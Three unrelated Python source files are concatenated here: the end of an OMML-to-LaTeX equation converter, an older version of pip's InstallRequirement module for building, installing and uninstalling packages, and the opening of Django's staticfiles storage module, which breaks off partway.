null = D_DEFAULT.get('null')
s_val = get_val(pr.begChr,default=D_DEFAULT.get('left'),store=T)
e_val = get_val(pr.endChr,default=D_DEFAULT.get('right'),store=T)
return pr.text+D.format(left= null if not s_val else escape_latex(s_val),
text=c_dict['e'],
right= null if not e_val else escape_latex(e_val))
def do_spre(self,elm):
"""
the Pre-Sub-Superscript object -- Not support yet
"""
pass
def do_sub(self,elm):
text = self.process_children(elm)
return SUB.format(text)
def do_sup(self,elm):
text = self.process_children(elm)
return SUP.format(text)
def do_f(self,elm):
"""
the fraction object
"""
c_dict = self.process_children_dict(elm)
pr = c_dict['fPr']
latex_s = get_val(pr.type,default=F_DEFAULT,store=F)
return pr.text+latex_s.format(num=c_dict.get('num'),den=c_dict.get('den'))
def do_func(self,elm):
"""
the Function-Apply object (Examples:sin cos)
"""
c_dict = self.process_children_dict(elm)
func_name = c_dict.get('fName')
return func_name.replace(FUNC_PLACE,c_dict.get('e'))
def do_fname(self,elm):
"""
the func name
"""
latex_chars = []
for stag,t,e in self.process_children_list(elm):
if stag == 'r':
if FUNC.get(t):
latex_chars.append(FUNC[t])
else :
raise NotSupport("Not support func %s" % t)
else:
latex_chars.append(t)
t = BLANK.join(latex_chars)
return t if FUNC_PLACE in t else t+FUNC_PLACE #do_func will replace this
def do_groupchr(self,elm):
"""
the Group-Character object
"""
c_dict = self.process_children_dict(elm)
pr = c_dict['groupChrPr']
latex_s = get_val(pr.chr)
return pr.text+latex_s.format(c_dict['e'])
def do_rad(self,elm):
"""
the radical object
"""
c_dict = self.process_children_dict(elm)
text = c_dict.get('e')
deg_text = c_dict.get('deg')
if deg_text:
return RAD.format(deg=deg_text,text=text)
else:
return RAD_DEFAULT.format(text=text)
def do_eqarr(self,elm):
"""
the Array object
"""
return ARR.format(text=BRK.join(
[t for stag,t,e in self.process_children_list(elm,include=('e',))]))
def do_limlow(self,elm):
"""
the Lower-Limit object
"""
t_dict = self.process_children_dict(elm,include=('e','lim'))
latex_s = LIM_FUNC.get(t_dict['e'])
if not latex_s :
raise NotSupport("Not support lim %s" % t_dict['e'])
else:
return latex_s.format(lim=t_dict.get('lim'))
def do_limupp(self,elm):
"""
the Upper-Limit object
"""
t_dict = self.process_children_dict(elm,include=('e','lim'))
return LIM_UPP.format(lim=t_dict.get('lim'),text=t_dict.get('e'))
def do_lim(self,elm):
"""
the lower limit of the limLow object and the upper limit of the limUpp function
"""
return self.process_children(elm).replace(LIM_TO[0],LIM_TO[1])
def do_m(self,elm):
"""
the Matrix object
"""
rows = []
for stag,t,e in self.process_children_list(elm):
if stag is 'mPr':
pass
elif stag == 'mr':
rows.append(t)
return M.format(text=BRK.join(rows))
def do_mr(self,elm):
"""
a single row of the matrix m
"""
return ALN.join(
[t for stag,t,e in self.process_children_list(elm,include=('e',))])
def do_nary(self,elm):
"""
the n-ary object
"""
res = []
bo = ''
for stag,t,e in self.process_children_list(elm):
if stag == 'naryPr':
bo = get_val(t.chr,store=CHR_BO)
else :
res.append(t)
return bo+BLANK.join(res)
def do_r(self,elm):
"""
Get text from 'r' element,And try convert them to latex symbols
@todo text style support , (sty)
@todo \text (latex pure text support)
"""
_str = []
for s in elm.findtext('./{0}t'.format(OMML_NS)):
#s = s if isinstance(s,unicode) else unicode(s,'utf-8')
_str.append(self._t_dict.get(s,s))
return escape_latex(BLANK.join(_str))
tag2meth={
'acc' : do_acc,
'r' : do_r,
'bar' : do_bar,
'sub' : do_sub,
'sup' : do_sup,
'f' : do_f,
'func': do_func,
'fName' : do_fname,
'groupChr' : do_groupchr,
'd' : do_d,
'rad' : do_rad,
'eqArr' : do_eqarr,
'limLow' : do_limlow,
'limUpp' : do_limupp,
'lim' : do_lim,
'm' : do_m,
'mr' : do_mr,
'nary' : do_nary,
}
| |
import os
import re
import shutil
import sys
import tempfile
import zipfile
from distutils.util import change_root
from distutils import sysconfig
from email.parser import FeedParser
import pip.wheel
from pip._vendor import pkg_resources, six
from pip._vendor.six.moves import configparser
from pip.compat import urllib, native_str, WINDOWS
from pip.download import is_url, url_to_path, path_to_url, is_archive_file
from pip.exceptions import (
InstallationError, UninstallationError, UnsupportedWheel,
)
from pip.index import Link
from pip.locations import (
bin_py, running_under_virtualenv, PIP_DELETE_MARKER_FILENAME, bin_user,
)
from pip.log import logger
from pip.util import (
display_path, rmtree, ask_path_exists, backup_dir, is_installable_dir,
dist_in_usersite, dist_in_site_packages, egg_link_path, make_path_relative,
call_subprocess, is_prerelease, read_text_file, FakeFile, _make_build_dir,
)
from pip.req.req_uninstall import UninstallPathSet
from pip.vcs import vcs
from pip.wheel import move_wheel_files, Wheel, wheel_ext
class InstallRequirement(object):
def __init__(self, req, comes_from, source_dir=None, editable=False,
url=None, as_egg=False, update=True, prereleases=None,
editable_options=None, pycompile=True):
self.extras = ()
if isinstance(req, six.string_types):
req = pkg_resources.Requirement.parse(req)
self.extras = req.extras
self.req = req
self.comes_from = comes_from
self.source_dir = source_dir
self.editable = editable
if editable_options is None:
editable_options = {}
self.editable_options = editable_options
self.url = url
self.as_egg = as_egg
self._egg_info_path = None
# This holds the pkg_resources.Distribution object if this requirement
# is already available:
self.satisfied_by = None
# This hold the pkg_resources.Distribution object if this requirement
# conflicts with another installed distribution:
self.conflicts_with = None
self._temp_build_dir = None
# True if the editable should be updated:
self.update = update
# Set to True after successful installation
self.install_succeeded = None
# UninstallPathSet of uninstalled distribution (for possible rollback)
self.uninstalled = None
self.use_user_site = False
self.target_dir = None
self.pycompile = pycompile
# True if pre-releases are acceptable
if prereleases:
self.prereleases = True
elif self.req is not None:
self.prereleases = any([
is_prerelease(x[1]) and x[0] != "!=" for x in self.req.specs
])
else:
self.prereleases = False
@classmethod
def from_editable(cls, editable_req, comes_from=None, default_vcs=None):
name, url, extras_override = parse_editable(editable_req, default_vcs)
if url.startswith('file:'):
source_dir = url_to_path(url)
else:
source_dir = None
res = cls(name, comes_from, source_dir=source_dir,
editable=True,
url=url,
editable_options=extras_override,
prereleases=True)
if extras_override is not None:
res.extras = extras_override
return res
@classmethod
def from_line(cls, name, comes_from=None, prereleases=None):
"""Creates an InstallRequirement from a name, which might be a
requirement, directory containing 'setup.py', filename, or URL.
"""
url = None
name = name.strip()
req = None
path = os.path.normpath(os.path.abspath(name))
link = None
if is_url(name):
link = Link(name)
elif (os.path.isdir(path)
and (os.path.sep in name or name.startswith('.'))):
if not is_installable_dir(path):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not "
"found." % name
)
link = Link(path_to_url(name))
elif is_archive_file(path):
if not os.path.isfile(path):
logger.warn(
'Requirement %r looks like a filename, but the file does '
'not exist',
name
)
link = Link(path_to_url(name))
# it's a local file, dir, or url
if link:
url = link.url
# Handle relative file URLs
if link.scheme == 'file' and re.search(r'\.\./', url):
url = path_to_url(os.path.normpath(os.path.abspath(link.path)))
# wheel file
if link.ext == wheel_ext:
wheel = Wheel(link.filename) # can raise InvalidWheelFilename
if not wheel.supported():
raise UnsupportedWheel(
"%s is not a supported wheel on this platform." %
wheel.filename
)
req = "%s==%s" % (wheel.name, wheel.version)
else:
# set the req to the egg fragment. when it's not there, this
# will become an 'unnamed' requirement
req = link.egg_fragment
# a requirement specifier
else:
req = name
return cls(req, comes_from, url=url, prereleases=prereleases)
def __str__(self):
if self.req:
s = str(self.req)
if self.url:
s += ' from %s' % self.url
else:
s = self.url
if self.satisfied_by is not None:
s += ' in %s' % display_path(self.satisfied_by.location)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += ' (from %s)' % comes_from
return s
def from_path(self):
if self.req is None:
return None
s = str(self.req)
if self.comes_from:
if isinstance(self.comes_from, six.string_types):
comes_from = self.comes_from
else:
comes_from = self.comes_from.from_path()
if comes_from:
s += '->' + comes_from
return s
def build_location(self, build_dir, unpack=True):
if self._temp_build_dir is not None:
return self._temp_build_dir
if self.req is None:
self._temp_build_dir = tempfile.mkdtemp('-build', 'pip-')
self._ideal_build_dir = build_dir
return self._temp_build_dir
if self.editable:
name = self.name.lower()
else:
name = self.name
# FIXME: Is there a better place to create the build_dir? (hg and bzr
# need this)
if not os.path.exists(build_dir):
_make_build_dir(build_dir)
return os.path.join(build_dir, name)
def correct_build_location(self):
"""If the build location was a temporary directory, this will move it
to a new more permanent location"""
if self.source_dir is not None:
return
assert self.req is not None
assert self._temp_build_dir
old_location = self._temp_build_dir
new_build_dir = self._ideal_build_dir
del self._ideal_build_dir
if self.editable:
name = self.name.lower()
else:
name = self.name
new_location = os.path.join(new_build_dir, name)
if not os.path.exists(new_build_dir):
logger.debug('Creating directory %s' % new_build_dir)
_make_build_dir(new_build_dir)
if os.path.exists(new_location):
raise InstallationError(
'A package already exists in %s; please remove it to continue'
% display_path(new_location))
logger.debug(
'Moving package %s from %s to new location %s' %
(self, display_path(old_location), display_path(new_location))
)
shutil.move(old_location, new_location)
self._temp_build_dir = new_location
self.source_dir = new_location
self._egg_info_path = None
@property
def name(self):
if self.req is None:
return None
return native_str(self.req.project_name)
@property
def url_name(self):
if self.req is None:
return None
return urllib.quote(self.req.unsafe_name)
@property
def setup_py(self):
try:
import setuptools # noqa
except ImportError:
# Setuptools is not available
raise InstallationError(
"setuptools must be installed to install from a source "
"distribution"
)
setup_file = 'setup.py'
if self.editable_options and 'subdirectory' in self.editable_options:
setup_py = os.path.join(self.source_dir,
self.editable_options['subdirectory'],
setup_file)
else:
setup_py = os.path.join(self.source_dir, setup_file)
# Python2 __file__ should not be unicode
if six.PY2 and isinstance(setup_py, six.text_type):
setup_py = setup_py.encode(sys.getfilesystemencoding())
return setup_py
def run_egg_info(self):
assert self.source_dir
if self.name:
logger.notify(
'Running setup.py (path:%s) egg_info for package %s' %
(self.setup_py, self.name)
)
else:
logger.notify(
'Running setup.py (path:%s) egg_info for package from %s' %
(self.setup_py, self.url)
)
logger.indent += 2
try:
# if it's distribute>=0.7, it won't contain an importable
# setuptools, and having an egg-info dir blocks the ability of
# setup.py to find setuptools plugins, so delete the egg-info dir
# if no setuptools. it will get recreated by the run of egg_info
# NOTE: this self.name check only works when installing from a
# specifier (not archive path/urls)
# TODO: take this out later
if (self.name == 'distribute'
and not os.path.isdir(
os.path.join(self.source_dir, 'setuptools'))):
rmtree(os.path.join(self.source_dir, 'distribute.egg-info'))
script = self._run_setup_py
script = script.replace('__SETUP_PY__', repr(self.setup_py))
script = script.replace('__PKG_NAME__', repr(self.name))
egg_info_cmd = [sys.executable, '-c', script, 'egg_info']
# We can't put the .egg-info files at the root, because then the
# source code will be mistaken for an installed egg, causing
# problems
if self.editable:
egg_base_option = []
else:
egg_info_dir = os.path.join(self.source_dir, 'pip-egg-info')
if not os.path.exists(egg_info_dir):
os.makedirs(egg_info_dir)
egg_base_option = ['--egg-base', 'pip-egg-info']
cwd = self.source_dir
if self.editable_options and \
'subdirectory' in self.editable_options:
cwd = os.path.join(cwd, self.editable_options['subdirectory'])
call_subprocess(
egg_info_cmd + egg_base_option,
cwd=cwd,
filter_stdout=self._filter_install,
show_stdout=False,
command_level=logger.VERBOSE_DEBUG,
command_desc='python setup.py egg_info')
finally:
logger.indent -= 2
if not self.req:
self.req = pkg_resources.Requirement.parse(
"%(Name)s==%(Version)s" % self.pkg_info())
self.correct_build_location()
# FIXME: This is a lame hack, entirely for PasteScript which has
# a self-provided entry point that causes this awkwardness
_run_setup_py = """
__file__ = __SETUP_PY__
from setuptools.command import egg_info
import pkg_resources
import os
import tokenize
def replacement_run(self):
self.mkpath(self.egg_info)
installer = self.distribution.fetch_build_egg
for ep in pkg_resources.iter_entry_points('egg_info.writers'):
# require=False is the change we're making:
writer = ep.load(require=False)
if writer:
writer(self, ep.name, os.path.join(self.egg_info,ep.name))
self.find_sources()
egg_info.egg_info.run = replacement_run
exec(compile(
getattr(tokenize, 'open', open)(__file__).read().replace('\\r\\n', '\\n'),
__file__,
'exec'
))
"""
def egg_info_data(self, filename):
if self.satisfied_by is not None:
if not self.satisfied_by.has_metadata(filename):
return None
return self.satisfied_by.get_metadata(filename)
assert self.source_dir
filename = self.egg_info_path(filename)
if not os.path.exists(filename):
return None
data = read_text_file(filename)
return data
def egg_info_path(self, filename):
if self._egg_info_path is None:
if self.editable:
base = self.source_dir
else:
base = os.path.join(self.source_dir, 'pip-egg-info')
filenames = os.listdir(base)
if self.editable:
filenames = []
for root, dirs, files in os.walk(base):
for dir in vcs.dirnames:
if dir in dirs:
dirs.remove(dir)
# Iterate over a copy of ``dirs``, since mutating
# a list while iterating over it can cause trouble.
# (See https://github.com/pypa/pip/pull/462.)
for dir in list(dirs):
# Don't search in anything that looks like a virtualenv
# environment
if (
os.path.exists(
os.path.join(root, dir, 'bin', 'python')
)
or os.path.exists(
os.path.join(
root, dir, 'Scripts', 'Python.exe'
)
)):
dirs.remove(dir)
# Also don't search through tests
elif dir == 'test' or dir == 'tests':
dirs.remove(dir)
filenames.extend([os.path.join(root, dir)
for dir in dirs])
filenames = [f for f in filenames if f.endswith('.egg-info')]
if not filenames:
raise InstallationError(
'No files/directories in %s (from %s)' % (base, filename)
)
assert filenames, \
"No files/directories in %s (from %s)" % (base, filename)
# if we have more than one match, we pick the toplevel one. This
# can easily be the case if there is a dist folder which contains
# an extracted tarball for testing purposes.
if len(filenames) > 1:
filenames.sort(
key=lambda x: x.count(os.path.sep)
+ (os.path.altsep and x.count(os.path.altsep) or 0)
)
self._egg_info_path = os.path.join(base, filenames[0])
return os.path.join(self._egg_info_path, filename)
def egg_info_lines(self, filename):
data = self.egg_info_data(filename)
if not data:
return []
result = []
for line in data.splitlines():
line = line.strip()
if not line or line.startswith('#'):
continue
result.append(line)
return result
def pkg_info(self):
p = FeedParser()
data = self.egg_info_data('PKG-INFO')
if not data:
logger.warn(
'No PKG-INFO file found in %s' %
display_path(self.egg_info_path('PKG-INFO'))
)
p.feed(data or '')
return p.close()
@property
def dependency_links(self):
return self.egg_info_lines('dependency_links.txt')
_requirements_section_re = re.compile(r'\[(.*?)\]')
def requirements(self, extras=()):
if self.satisfied_by:
for r in self.satisfied_by.requires(extras):
yield str(r)
return
in_extra = None
for line in self.egg_info_lines('requires.txt'):
match = self._requirements_section_re.match(line.lower())
if match:
in_extra = match.group(1)
continue
if in_extra and in_extra not in extras:
logger.debug('skipping extra %s' % in_extra)
# Skip requirement for an extra we aren't requiring
continue
yield line
@property
def absolute_versions(self):
for qualifier, version in self.req.specs:
if qualifier == '==':
yield version
@property
def installed_version(self):
return self.pkg_info()['version']
def assert_source_matches_version(self):
assert self.source_dir
version = self.installed_version
if version not in self.req:
logger.warn(
'Requested %s, but installing version %s' %
(self, self.installed_version)
)
else:
logger.debug(
'Source in %s has version %s, which satisfies requirement %s' %
(display_path(self.source_dir), version, self)
)
def update_editable(self, obtain=True):
if not self.url:
logger.info(
"Cannot update repository at %s; repository location is "
"unknown" % self.source_dir
)
return
assert self.editable
assert self.source_dir
if self.url.startswith('file:'):
# Static paths don't get updated
return
assert '+' in self.url, "bad url: %r" % self.url
if not self.update:
return
vc_type, url = self.url.split('+', 1)
backend = vcs.get_backend(vc_type)
if backend:
vcs_backend = backend(self.url)
if obtain:
vcs_backend.obtain(self.source_dir)
else:
vcs_backend.export(self.source_dir)
else:
assert 0, (
'Unexpected version control type (in %s): %s'
% (self.url, vc_type))
def uninstall(self, auto_confirm=False):
"""
Uninstall the distribution currently satisfying this requirement.
Prompts before removing or modifying files unless
``auto_confirm`` is True.
Refuses to delete or modify files outside of ``sys.prefix`` -
thus uninstallation within a virtual environment can only
modify that virtual environment, even if the virtualenv is
linked to global site-packages.
"""
if not self.check_if_exists():
raise UninstallationError(
"Cannot uninstall requirement %s, not installed" % (self.name,)
)
dist = self.satisfied_by or self.conflicts_with
paths_to_remove = UninstallPathSet(dist)
pip_egg_info_path = os.path.join(dist.location,
dist.egg_name()) + '.egg-info'
dist_info_path = os.path.join(dist.location,
'-'.join(dist.egg_name().split('-')[:2])
) + '.dist-info'
# Workaround - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=618367
debian_egg_info_path = pip_egg_info_path.replace(
'-py%s' % pkg_resources.PY_MAJOR, '')
easy_install_egg = dist.egg_name() + '.egg'
develop_egg_link = egg_link_path(dist)
pip_egg_info_exists = os.path.exists(pip_egg_info_path)
debian_egg_info_exists = os.path.exists(debian_egg_info_path)
dist_info_exists = os.path.exists(dist_info_path)
if pip_egg_info_exists or debian_egg_info_exists:
# package installed by pip
if pip_egg_info_exists:
egg_info_path = pip_egg_info_path
else:
egg_info_path = debian_egg_info_path
paths_to_remove.add(egg_info_path)
if dist.has_metadata('installed-files.txt'):
for installed_file in dist.get_metadata(
'installed-files.txt').splitlines():
path = os.path.normpath(
os.path.join(egg_info_path, installed_file)
)
paths_to_remove.add(path)
# FIXME: need a test for this elif block
# occurs with --single-version-externally-managed/--record outside
# of pip
elif dist.has_metadata('top_level.txt'):
if dist.has_metadata('namespace_packages.txt'):
namespaces = dist.get_metadata('namespace_packages.txt')
else:
namespaces = []
for top_level_pkg in [
p for p
in dist.get_metadata('top_level.txt').splitlines()
if p and p not in namespaces]:
path = os.path.join(dist.location, top_level_pkg)
paths_to_remove.add(path)
paths_to_remove.add(path + '.py')
paths_to_remove.add(path + '.pyc')
elif dist.location.endswith(easy_install_egg):
# package installed by easy_install
paths_to_remove.add(dist.location)
easy_install_pth = os.path.join(os.path.dirname(dist.location),
'easy-install.pth')
paths_to_remove.add_pth(easy_install_pth, './' + easy_install_egg)
elif develop_egg_link:
# develop egg
fh = open(develop_egg_link, 'r')
link_pointer = os.path.normcase(fh.readline().strip())
fh.close()
assert (link_pointer == dist.location), (
'Egg-link %s does not match installed location of %s '
'(at %s)' % (link_pointer, self.name, dist.location)
)
paths_to_remove.add(develop_egg_link)
easy_install_pth = os.path.join(os.path.dirname(develop_egg_link),
'easy-install.pth')
paths_to_remove.add_pth(easy_install_pth, dist.location)
elif dist_info_exists:
for path in pip.wheel.uninstallation_paths(dist):
paths_to_remove.add(path)
# find distutils scripts= scripts
if dist.has_metadata('scripts') and dist.metadata_isdir('scripts'):
for script in dist.metadata_listdir('scripts'):
if dist_in_usersite(dist):
bin_dir = bin_user
else:
bin_dir = bin_py
paths_to_remove.add(os.path.join(bin_dir, script))
if WINDOWS:
paths_to_remove.add(os.path.join(bin_dir, script) + '.bat')
# find console_scripts
if dist.has_metadata('entry_points.txt'):
config = configparser.SafeConfigParser()
config.readfp(
FakeFile(dist.get_metadata_lines('entry_points.txt'))
)
if config.has_section('console_scripts'):
for name, value in config.items('console_scripts'):
if dist_in_usersite(dist):
bin_dir = bin_user
else:
bin_dir = bin_py
paths_to_remove.add(os.path.join(bin_dir, name))
if WINDOWS:
paths_to_remove.add(
os.path.join(bin_dir, name) + '.exe'
)
paths_to_remove.add(
os.path.join(bin_dir, name) + '.exe.manifest'
)
paths_to_remove.add(
os.path.join(bin_dir, name) + '-script.py'
)
paths_to_remove.remove(auto_confirm)
self.uninstalled = paths_to_remove
def rollback_uninstall(self):
if self.uninstalled:
self.uninstalled.rollback()
else:
logger.error("Can't rollback %s, nothing uninstalled."
% (self.project_name,))
def commit_uninstall(self):
if self.uninstalled:
self.uninstalled.commit()
else:
logger.error("Can't commit %s, nothing uninstalled."
% (self.project_name,))
def archive(self, build_dir):
assert self.source_dir
create_archive = True
archive_name = '%s-%s.zip' % (self.name, self.installed_version)
archive_path = os.path.join(build_dir, archive_name)
if os.path.exists(archive_path):
response = ask_path_exists(
'The file %s exists. (i)gnore, (w)ipe, (b)ackup ' %
display_path(archive_path), ('i', 'w', 'b'))
if response == 'i':
create_archive = False
elif response == 'w':
logger.warn('Deleting %s' % display_path(archive_path))
os.remove(archive_path)
elif response == 'b':
dest_file = backup_dir(archive_path)
logger.warn(
'Backing up %s to %s' %
(display_path(archive_path), display_path(dest_file))
)
shutil.move(archive_path, dest_file)
if create_archive:
zip = zipfile.ZipFile(
archive_path, 'w', zipfile.ZIP_DEFLATED,
allowZip64=True
)
dir = os.path.normcase(os.path.abspath(self.source_dir))
for dirpath, dirnames, filenames in os.walk(dir):
if 'pip-egg-info' in dirnames:
dirnames.remove('pip-egg-info')
for dirname in dirnames:
dirname = os.path.join(dirpath, dirname)
name = self._clean_zip_name(dirname, dir)
zipdir = zipfile.ZipInfo(self.name + '/' + name + '/')
zipdir.external_attr = 0x1ED << 16 # 0o755
zip.writestr(zipdir, '')
for filename in filenames:
if filename == PIP_DELETE_MARKER_FILENAME:
continue
filename = os.path.join(dirpath, filename)
name = self._clean_zip_name(filename, dir)
zip.write(filename, self.name + '/' + name)
zip.close()
logger.indent -= 2
logger.notify('Saved %s' % display_path(archive_path))
def _clean_zip_name(self, name, prefix):
assert name.startswith(prefix + os.path.sep), (
"name %r doesn't start with prefix %r" % (name, prefix)
)
name = name[len(prefix) + 1:]
name = name.replace(os.path.sep, '/')
return name
def install(self, install_options, global_options=(), root=None):
if self.editable:
self.install_editable(install_options, global_options)
return
if self.is_wheel:
version = pip.wheel.wheel_version(self.source_dir)
pip.wheel.check_compatibility(version, self.name)
self.move_wheel_files(self.source_dir, root=root)
self.install_succeeded = True
return
temp_location = tempfile.mkdtemp('-record', 'pip-')
record_filename = os.path.join(temp_location, 'install-record.txt')
try:
install_args = [sys.executable]
install_args.append('-c')
install_args.append(
"import setuptools, tokenize;__file__=%r;"
"exec(compile(getattr(tokenize, 'open', open)(__file__).read()"
".replace('\\r\\n', '\\n'), __file__, 'exec'))" % self.setup_py
)
install_args += list(global_options) + \
['install', '--record', record_filename]
if not self.as_egg:
install_args += ['--single-version-externally-managed']
if root is not None:
install_args += ['--root', root]
if self.pycompile:
install_args += ["--compile"]
else:
install_args += ["--no-compile"]
if running_under_virtualenv():
# FIXME: I'm not sure if this is a reasonable location;
# probably not but we can't put it in the default location, as
# that is a virtualenv symlink that isn't writable
py_ver_str = 'python' + sysconfig.get_python_version()
install_args += ['--install-headers',
os.path.join(sys.prefix, 'include', 'site',
py_ver_str)]
logger.notify('Running setup.py install for %s' % self.name)
logger.indent += 2
try:
call_subprocess(
install_args + install_options,
cwd=self.source_dir,
filter_stdout=self._filter_install,
show_stdout=False,
)
finally:
logger.indent -= 2
if not os.path.exists(record_filename):
logger.notify('Record file %s not found' % record_filename)
return
self.install_succeeded = True
if self.as_egg:
# there's no --always-unzip option we can pass to install
# command so we unable to save the installed-files.txt
return
def prepend_root(path):
if root is None or not os.path.isabs(path):
return path
else:
return change_root(root, path)
f = open(record_filename)
for line in f:
line = line.strip()
if line.endswith('.egg-info'):
egg_info_dir = prepend_root(line)
break
else:
logger.warn(
'Could not find .egg-info directory in install record for '
'%s' % self
)
f.close()
# FIXME: put the record somewhere
# FIXME: should this be an error?
return
f.close()
new_lines = []
f = open(record_filename)
for line in f:
filename = line.strip()
if os.path.isdir(filename):
filename += os.path.sep
new_lines.append(
make_path_relative(prepend_root(filename), egg_info_dir)
)
f.close()
f = open(os.path.join(egg_info_dir, 'installed-files.txt'), 'w')
f.write('\n'.join(new_lines) + '\n')
f.close()
finally:
if os.path.exists(record_filename):
os.remove(record_filename)
os.rmdir(temp_location)
def remove_temporary_source(self):
"""Remove the source files from this requirement, if they are marked
for deletion"""
if os.path.exists(self.delete_marker_filename):
logger.info('Removing source in %s' % self.source_dir)
if self.source_dir:
rmtree(self.source_dir)
self.source_dir = None
if self._temp_build_dir and os.path.exists(self._temp_build_dir):
rmtree(self._temp_build_dir)
self._temp_build_dir = None
def install_editable(self, install_options, global_options=()):
logger.notify('Running setup.py develop for %s' % self.name)
logger.indent += 2
try:
# FIXME: should we do --install-headers here too?
cwd = self.source_dir
if self.editable_options and \
'subdirectory' in self.editable_options:
cwd = os.path.join(cwd, self.editable_options['subdirectory'])
call_subprocess(
[
sys.executable,
'-c',
"import setuptools, tokenize; __file__=%r; exec(compile("
"getattr(tokenize, 'open', open)(__file__).read().replace"
"('\\r\\n', '\\n'), __file__, 'exec'))" % self.setup_py
]
+ list(global_options)
+ ['develop', '--no-deps']
+ list(install_options),
cwd=cwd, filter_stdout=self._filter_install,
show_stdout=False)
finally:
logger.indent -= 2
self.install_succeeded = True
def _filter_install(self, line):
level = logger.NOTIFY
for regex in [
r'^running .*',
r'^writing .*',
'^creating .*',
'^[Cc]opying .*',
r'^reading .*',
r"^removing .*\.egg-info' \(and everything under it\)$",
r'^byte-compiling ',
r'^SyntaxError:',
r'^SyntaxWarning:',
# Not sure what this warning is, but it seems harmless:
r"^warning: manifest_maker: standard file '-c' not found$"]:
if re.search(regex, line.strip()):
level = logger.INFO
break
return (level, line)
def check_if_exists(self):
"""Find an installed distribution that satisfies or conflicts
with this requirement, and set self.satisfied_by or
self.conflicts_with appropriately."""
if self.req is None:
return False
try:
# DISTRIBUTE TO SETUPTOOLS UPGRADE HACK (1 of 3 parts)
# if we've already set distribute as a conflict to setuptools
# then this check has already run before. we don't want it to
# run again, and return False, since it would block the uninstall
# TODO: remove this later
if (self.req.project_name == 'setuptools'
and self.conflicts_with
and self.conflicts_with.project_name == 'distribute'):
return True
else:
self.satisfied_by = pkg_resources.get_distribution(self.req)
except pkg_resources.DistributionNotFound:
return False
except pkg_resources.VersionConflict:
existing_dist = pkg_resources.get_distribution(
self.req.project_name
)
if self.use_user_site:
if dist_in_usersite(existing_dist):
self.conflicts_with = existing_dist
elif (running_under_virtualenv()
and dist_in_site_packages(existing_dist)):
raise InstallationError(
"Will not install to the user site because it will "
"lack sys.path precedence to %s in %s" %
(existing_dist.project_name, existing_dist.location)
)
else:
self.conflicts_with = existing_dist
return True
@property
def is_wheel(self):
return self.url and '.whl' in self.url
def move_wheel_files(self, wheeldir, root=None):
move_wheel_files(
self.name, self.req, wheeldir,
user=self.use_user_site,
home=self.target_dir,
root=root,
pycompile=self.pycompile,
)
@property
def delete_marker_filename(self):
assert self.source_dir
return os.path.join(self.source_dir, PIP_DELETE_MARKER_FILENAME)
def _strip_postfix(req):
"""
Strip req postfix ( -dev, 0.2, etc )
"""
# FIXME: use package_to_requirement?
match = re.search(r'^(.*?)(?:-dev|-\d.*)$', req)
if match:
# Strip off -dev, -0.2, etc.
req = match.group(1)
return req
def _build_req_from_url(url):
parts = [p for p in url.split('#', 1)[0].split('/') if p]
req = None
if parts[-2] in ('tags', 'branches', 'tag', 'branch'):
req = parts[-3]
elif parts[-1] == 'trunk':
req = parts[-2]
return req
def _build_editable_options(req):
"""
This method generates a dictionary of the query string
parameters contained in a given editable URL.
"""
regexp = re.compile(r"[\?#&](?P<name>[^&=]+)=(?P<value>[^&=]+)")
matched = regexp.findall(req)
if matched:
ret = dict()
for option in matched:
(name, value) = option
if name in ret:
raise Exception("%s option already defined" % name)
ret[name] = value
return ret
return None
def parse_editable(editable_req, default_vcs=None):
"""Parses svn+http://blahblah@rev#egg=Foobar into a requirement
(Foobar) and a URL"""
url = editable_req
extras = None
# If a file path is specified with extras, strip off the extras.
m = re.match(r'^(.+)(\[[^\]]+\])$', url)
if m:
url_no_extras = m.group(1)
extras = m.group(2)
else:
url_no_extras = url
if os.path.isdir(url_no_extras):
if not os.path.exists(os.path.join(url_no_extras, 'setup.py')):
raise InstallationError(
"Directory %r is not installable. File 'setup.py' not found." %
url_no_extras
)
# Treating it as code that has already been checked out
url_no_extras = path_to_url(url_no_extras)
if url_no_extras.lower().startswith('file:'):
if extras:
return (
None,
url_no_extras,
pkg_resources.Requirement.parse(
'__placeholder__' + extras
).extras,
)
else:
return None, url_no_extras, None
for version_control in vcs:
if url.lower().startswith('%s:' % version_control):
url = '%s+%s' % (version_control, url)
break
if '+' not in url:
if default_vcs:
url = default_vcs + '+' + url
else:
raise InstallationError(
'%s should either be a path to a local project or a VCS url '
'beginning with svn+, git+, hg+, or bzr+' %
editable_req
)
vc_type = url.split('+', 1)[0].lower()
if not vcs.get_backend(vc_type):
error_message = 'For --editable=%s only ' % editable_req + \
', '.join([backend.name + '+URL' for backend in vcs.backends]) + \
' is currently supported'
raise InstallationError(error_message)
try:
options = _build_editable_options(editable_req)
except Exception as exc:
raise InstallationError(
'--editable=%s error in editable options:%s' % (editable_req, exc)
)
if not options or 'egg' not in options:
req = _build_req_from_url(editable_req)
if not req:
raise InstallationError(
'--editable=%s is not the right format; it must have '
'#egg=Package' % editable_req
)
else:
req = options['egg']
package = _strip_postfix(req)
return package, url, options
| |
from __future__ import with_statement
import hashlib
import os
import posixpath
import re
from urllib import unquote
from urlparse import urlsplit, urlunsplit
from django.conf import settings
from django.core.cache import (get_cache, InvalidCacheBackendError,
cache as default_cache)
from django.core.exceptions import ImproperlyConfigured
from django.core.files.base import ContentFile
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.utils.encoding import force_unicode
from django.utils.functional import LazyObject
from django.utils.importlib import import_module
from django.utils.datastructures import SortedDict
from django.contrib.staticfiles.utils import check_settings, matches_patterns
class StaticFilesStorage(FileSystemStorage):
"""
Standard file system storage for static files.
The defaults for ``location`` and ``base_url`` are
``STATIC_ROOT`` and ``STATIC_URL``.
"""
def __init__(self, location=None, base_url=None, *args, **kwargs):
if location is None:
location = settings.STATIC_ROOT
if base_url is None:
base_url = settings.STATIC_URL
check_settings(base_url)
super(StaticFilesStorage, self).__init__(location, base_url,
*args, **kwargs)
def path(self, name):
if not self.location:
raise ImproperlyConfigured("You're using the staticfiles app "
"without having set the STATIC_ROOT "
"setting to a filesystem path.")
return super(StaticFilesStorage, self).path(name)
class CachedFilesMixin(object):
patterns = (
("*.css", (
r"""(url\(['"]{0,1}\s*(.*?)["']{0,1}\))""",
r"""(@import\s*["']\s*(.*?)["'])""",
)),
)
def __init__(self, *args, **kwargs):
super(CachedFilesMixin, self).__init__(*args, **kwargs)
try:
self.cache = get_cache('staticfiles')
